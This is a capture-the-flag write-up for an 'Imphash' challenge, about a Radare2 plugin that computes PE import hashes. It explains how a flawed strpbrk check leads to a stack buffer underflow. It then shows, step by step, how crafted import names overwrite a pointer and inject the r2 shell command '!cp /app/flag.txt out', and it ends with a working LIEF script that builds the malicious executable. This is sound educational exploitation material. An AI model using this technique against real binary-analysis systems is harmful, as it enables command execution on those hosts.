Imphash

This challenge involves a Radare2 (r2) plugin that calculates the import hash (imphash) of a Windows Portable Executable (PE) file.

A logic error in the validation of the library name results in a buffer underflow when the name is less than 4 bytes long.

Challenge information

Almost there agent, we might have a chance to gain access into the enemy’s systems again!! We are so close.

But, it seems like they’ve developed a robust anti-malware service that’s thwarting all attempts to breach their systems!

We’ve found this import hashing plugin which is a key component of their malware analysis pipeline. Agent, can you find a way around it?

Challenge files

nc chals.junron.dev 1337

Challenge writeup

Overview

First, the iIj r2 command is executed to gather information about the input executable file. The plugin aborts immediately if the file is not a PE file:

c
v23 = r_core_cmd_str(v24, "iIj");
v22 = cJSON_Parse(v23);
bintype = cJSON_GetObjectItemCaseSensitive(v22, "bintype");
if ( !strncmp(bintype->valuestring, "pe", 2uLL) ){
  // continue
} else {
  puts("File is not PE file!");
  return 1LL;
}

Once we have validated that the input is a real PE file, we can move on to actually calculating the imphash.

  1. For each import, retrieve the library name (e.g. kernel32.dll) and function name (e.g. CreateProcessA)

    a. Remove the .dll, .sys or .ocx from the library name

    b. Convert everything to lowercase

    c. Join the library name and function name with a .

  2. Join all the results with ,

  3. Return the MD5 hash of the result
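
The three steps above can be sketched in Python as follows. This is a simplified illustration rather than the plugin's code: the function name imphash and the (library, function) pair format are hypothetical, and the sketch strips only a trailing extension, which is what the steps describe.

```python
import hashlib

# Extensions stripped from library names, per step 1a.
STRIPPED_EXTENSIONS = (".dll", ".sys", ".ocx")


def imphash(imports):
    """Compute an imphash from (library, function) pairs, in import order."""
    parts = []
    for library, function in imports:
        library = library.lower()                       # step 1b
        for ext in STRIPPED_EXTENSIONS:
            if library.endswith(ext):
                library = library[: -len(ext)]          # step 1a
                break
        parts.append(f"{library}.{function.lower()}")   # step 1c
    joined = ",".join(parts)                            # step 2
    return hashlib.md5(joined.encode()).hexdigest()     # step 3


example = [("KERNEL32.dll", "CreateProcessA"), ("USER32.dll", "MessageBoxA")]
print(imphash(example))
```

Here the string that gets hashed is kernel32.createprocessa,user32.messageboxa.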

Steps 1 and 2 of the above process are implemented as follows:

c
libname = v23->valuestring;
name = v22->valuestring;
v19 = strpbrk(libname, ".dll");
if ( !v19 || v19 == libname )
{
  v18 = strpbrk(libname, ".ocx");
  if ( !v18 || v18 == libname )
  {
    v17 = strpbrk(libname, ".sys");
    if ( !v17 || v17 == libname )
    {
      puts("Invalid library name! Must end in .dll, .ocx or .sys!");
      return 1LL;
    }
  }
}
libname_len = strlen(libname) - 4;
name_len = strlen(name);
if ( 4094LL - ptr < (unsigned __int64)(libname_len + name_len) )
{
  puts("Imports too long!");
  return 1LL;
}
for ( j = 0; j < libname_len; ++j )
  tmp_buf[ptr + j] = tolower(libname[j]);
ptr += libname_len;
tmp_buf[ptr++] = '.';
for ( k = 0; k < name_len; ++k )
  tmp_buf[ptr + k] = tolower(name[k]);
ptr += name_len;
tmp_buf[ptr++] = ',';

First, the plugin checks that the library name contains .dll, .ocx or .sys, and that the match doesn't occur at the start of the string. If the check passes, the length of the library name is reduced by 4 to remove the file extension.

However, anyone experienced in C programming will quickly notice that strpbrk doesn't check whether the string passed as the second argument is a substring of the first argument. Instead, it returns a pointer to the first character in the first string that matches any character in the second string, or NULL if there is none. Therefore, the string "a." passes the check, since it contains ., which is one of the characters in ".dll".

For "a.", strlen(libname) - 4 evaluates to -2. With libname_len negative, the copy loop is skipped and ptr is moved backwards, resulting in a buffer underflow in the following code:

c
for ( j = 0; j < libname_len; ++j )
  tmp_buf[ptr + j] = tolower(libname[j]);
ptr += libname_len;
tmp_buf[ptr++] = '.';
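
The flawed check can be reproduced with a small Python model. The helper strpbrk below imitates the C function by returning an index instead of a pointer, plugin_accepts mirrors the nested checks in the decompiled code, and intended_check is only a guess at what the author of the plugin meant to write; all three names are hypothetical.

```python
def strpbrk(s, accept):
    """Model of C strpbrk: index of the first char of s found in accept, else None."""
    for i, ch in enumerate(s):
        if ch in accept:
            return i
    return None


def plugin_accepts(libname):
    """Mirror the plugin's check: a match must exist and must not be at index 0."""
    for ext in (".dll", ".ocx", ".sys"):
        hit = strpbrk(libname, ext)
        if hit is not None and hit != 0:
            return True
    return False


def intended_check(libname):
    """Assumed intent: the name must really end in one of the extensions."""
    return len(libname) > 4 and libname.lower().endswith((".dll", ".ocx", ".sys"))


for name in ("kernel32.dll", "a.", "dll"):
    # Columns: name, plugin verdict, intended verdict, resulting libname_len
    print(name, plugin_accepts(name), intended_check(name), len(name) - 4)
```

The name "a." is accepted by the plugin's logic but rejected by the suffix check, and its computed length is -2.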

You might have noticed an additional vulnerability in the length check 4094LL - ptr < (unsigned __int64)(libname_len + name_len). When writing this challenge, I thought it would not be exploitable, as none of the variables located after tmp_buf in the stack were interesting. However, some participants (1 and 2) were able to exploit this by overwriting the name_len variable.

Exploitation

Since the challenge is completely non-interactive, we will need to execute a 'one-shot' attack with no leaks. Therefore, the only available target is out_buf:

c
strcpy(out_buf, "echo ");
strcpy(&out_buf[37], " > out");

// Fill up tmp_buf

MD5_Init(md5);
v8 = strlen(tmp_buf);
MD5_Update(md5, tmp_buf, v8 - 1);
MD5_Final(md5_hash, md5);
hex_alphabet = "0123456789abcdef";
for ( idx = 0; idx <= 15; ++idx )
{
  out_buf[2 * idx + 5] = hex_alphabet[(md5_hash[idx] >> 4) & 0xF];
  out_buf[2 * idx + 6] = hex_alphabet[md5_hash[idx] & 0xF];
}
v9 = (void *)r_core_cmd_str(v30, out_buf);

The intended purpose of out_buf is to store the r2 command that will be used to write the imphash to the out file. However, r2 also includes the ability to execute system commands, prefixed by !. Therefore, if we can control the out_buf buffer, we can inject arbitrary commands that will be executed.

The relevant stack layout is shown below:

c
char out_buf[256]; // [rsp+80h] [rbp-11A0h] BYREF
__int16 ptr; // [rsp+180h] [rbp-10A0h]
char tmp_buf[4096]; // [rsp+182h] [rbp-109Eh] BYREF

strcpy(out_buf, "echo ");
strcpy(&out_buf[37], " > out");

Note that tmp_buf starts 0x102 bytes after out_buf. The ideal location for our payload is the out filename at the end of the command: there, it will not be overwritten by the MD5 imphash, and the existing command structure is maintained. Since the filename begins at out_buf[40], this corresponds to a ptr value of 40 - 0x102 = -218.
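
The offset arithmetic can be checked with a few lines of Python. The rbp-relative offsets are copied from the stack layout above; the helper tmp_index is a hypothetical name introduced only for this sketch.

```python
# Frame offsets relative to rbp, taken from the decompiled stack layout.
OUT_BUF = -0x11A0
PTR = -0x10A0
TMP_BUF = -0x109E


def tmp_index(out_buf_offset):
    """Index into tmp_buf that aliases out_buf[out_buf_offset]."""
    return (OUT_BUF + out_buf_offset) - TMP_BUF


# "echo " (5 bytes) plus 32 hex digits puts " > out" at out_buf[37].
suffix_start = len("echo ") + 32
filename_start = suffix_start + len(" > ")

print(hex(TMP_BUF - OUT_BUF))       # 0x102: distance between the two buffers
print(tmp_index(filename_start))    # -218: tmp_buf index of the 'o' in "out"
print(PTR - TMP_BUF)                # -2: ptr sits directly before tmp_buf
```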

Next, let's observe how the buffer underflow will affect the stack variables:

c
ptr += libname_len; // libname_len = -2, ptr = -2
tmp_buf[ptr++] = '.'; // ptr = -209

First, ptr is set to -2. In 16-bit 2's complement, this is 0xfffe or 0xfe 0xff in little-endian.

Next, tmp_buf[-2] is set to . (hex 0x2e). Because ptr is stored in the two bytes immediately before tmp_buf, this overwrites the lower byte of ptr, which now has the value 0xff2e, or -210. This value is then incremented (ptr++) to -209, which is a little more than the -218 we want. Thus, we will have to overwrite ptr a second time. We set the function name to a string of 206 characters, which moves ptr up to -2 once the ptr++ for the appended , is included.

c
tmp_buf[ptr++] = '.'; // ptr = -209
for ( k = 0; k < name_len; ++k )
  tmp_buf[ptr + k] = tolower(name[k]);
ptr += name_len; // ptr = -3
tmp_buf[ptr++] = ','; // ptr = -2
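
The 16-bit arithmetic for the first import can be verified with Python's struct module. This is a sketch of the values described above, not of the plugin itself; overwrite_low_byte is a hypothetical helper.

```python
import struct


def overwrite_low_byte(value, byte):
    """Replace the low byte of a little-endian int16 and return the new value."""
    raw = bytearray(struct.pack("<h", value))
    raw[0] = byte
    return struct.unpack("<h", raw)[0]


ptr = -2                                  # after ptr += libname_len
print(struct.pack("<h", ptr).hex())       # feff: the bytes 0xfe 0xff in memory
ptr = overwrite_low_byte(ptr, ord("."))   # tmp_buf[-2] aliases ptr's low byte
print(ptr)                                # -210, i.e. 0xff2e
ptr += 1                                  # the ptr++ after writing '.'
ptr += 206                                # length of the function name
ptr += 1                                  # the ptr++ after writing ','
print(ptr)                                # -2
```

The same helper gives -220 for the $ (0x24) overwrite used in the second import.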

For the second import, we will keep the libname the same, while specifying A$ as the function name.

c
for ( j = 0; j < libname_len; ++j )
  tmp_buf[ptr + j] = tolower(libname[j]);
// libname_len = -2
ptr += libname_len; // ptr = -4
tmp_buf[ptr++] = '.'; // ptr = -3
for ( k = 0; k < name_len; ++k )
  tmp_buf[ptr + k] = tolower(name[k]); // In the second iteration, ptr = -220
ptr += name_len; // ptr = -218
tmp_buf[ptr++] = ','; // ptr = -217

This lines up the lower byte of ptr to be overwritten by $. This causes ptr to be 0xff24, or -220. After adding the name_len and ,, ptr is -217.

In the third import, we will finally write the payload. We will keep the libname the same, while specifying a;!cp /app/flag.txt out; as the function name.

c
for ( j = 0; j < libname_len; ++j )
  tmp_buf[ptr + j] = tolower(libname[j]);
// libname_len = -2
ptr += libname_len; // ptr = -219
tmp_buf[ptr++] = '.'; // ptr = -218
for ( k = 0; k < name_len; ++k )
  tmp_buf[ptr + k] = tolower(name[k]);

After subtracting 2 and adding 1 for ., ptr is finally lined up at -218, just as we begin to write the function name. In the end, the command executed will be:

echo 76df02635dd147d8d5aa7a233e4117e5 >.a;!cp /app/flag.txt out;
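
The whole chain can be replayed in a small Python model of the stack frame. It rests on several assumptions: out_buf, ptr and tmp_buf are laid out contiguously as in the decompiled listing, ptr is re-read from memory on every access (as the walkthrough above implies), and the hash is not recomputed but copied from the command shown above. All helper names are hypothetical.

```python
import struct

PTR_OFF, TMP_OFF = 256, 258              # out_buf[256] | ptr (int16) | tmp_buf[4096]
mem = bytearray(TMP_OFF + 4096)          # zero-filled model of the three variables

# Command skeleton written before the imports are processed.
mem[0:5] = b"echo "
mem[37:43] = b" > out"


def get_ptr():
    return struct.unpack_from("<h", mem, PTR_OFF)[0]


def set_ptr(value):
    struct.pack_into("<h", mem, PTR_OFF, value)


def put(index, ch):
    """tmp_buf[index] = ch; a negative index reaches ptr and out_buf."""
    mem[TMP_OFF + index] = ord(ch)


def add_import(libname, name):
    libname_len = len(libname) - 4       # -2 for "a."
    for j in range(libname_len):         # empty loop when the length is negative
        put(get_ptr() + j, libname[j].lower())
    set_ptr(get_ptr() + libname_len)
    put(get_ptr(), ".")                  # may clobber ptr's low byte
    set_ptr(get_ptr() + 1)
    for k in range(len(name)):
        put(get_ptr() + k, name[k].lower())
    set_ptr(get_ptr() + len(name))
    put(get_ptr(), ",")
    set_ptr(get_ptr() + 1)


add_import("a.", "A" * 206)
add_import("a.", "A$")
add_import("a.", "a;!cp /app/flag.txt out;")

# Placeholder hash taken from the writeup's final command, not recomputed here.
mem[5:37] = b"76df02635dd147d8d5aa7a233e4117e5"

# First 64 bytes of out_buf; later bytes still hold filler from the first import.
command = mem[:64].decode()
print(command)
```

In this model the first 64 bytes of out_buf match the command above, with the payload starting exactly at the former out filename.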

This solution is probably a little overcomplicated, and other solutions are possible.

Challenge solution script
python
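from lief import PE

# Parse a template PE file whose imports will be replaced.
binary32 = PE.parse("./clear.exe")

binary32.remove_all_libraries()

# "a." passes the strpbrk check and yields libname_len = -2.
a = binary32.add_library("a.")
a.add_entry("A"*206)  # first import: moves ptr from -209 up to -2
a.add_entry("A$")  # second import: '$' (0x24) overwrites the low byte of ptr
a.add_entry("a;!cp /app/flag.txt out;")  # third import: payload written at -218

# Rebuild the import table and write the modified executable.
builder = PE.Builder(binary32)
builder.build_imports(True)
builder.build()
builder.write("solve.exe")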